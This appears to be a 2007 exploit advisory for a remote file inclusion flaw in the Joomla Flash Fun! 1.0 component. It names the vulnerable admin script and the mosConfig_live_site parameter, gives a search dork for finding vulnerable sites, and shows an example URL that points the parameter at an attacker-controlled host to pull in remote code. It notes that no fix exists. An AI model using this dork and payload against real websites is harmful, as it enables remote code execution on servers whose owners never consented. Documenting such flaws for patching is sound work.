Joomla Component Flash Fun! 1.0 Remote File Inclusion Vulnerability

2007-09-15 00:00:00

######################################
# Joomla Flash Fun! Component RFI #
######################################

Bug in :
/administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=
Variable : $mosConfig_live_site

Dork: "com_joomlaflashfun"

Example:

http://xxx.net/2007/administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=[attacker]


Greets to all Irc.RealWorm.Net #Morgan Users ;)

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.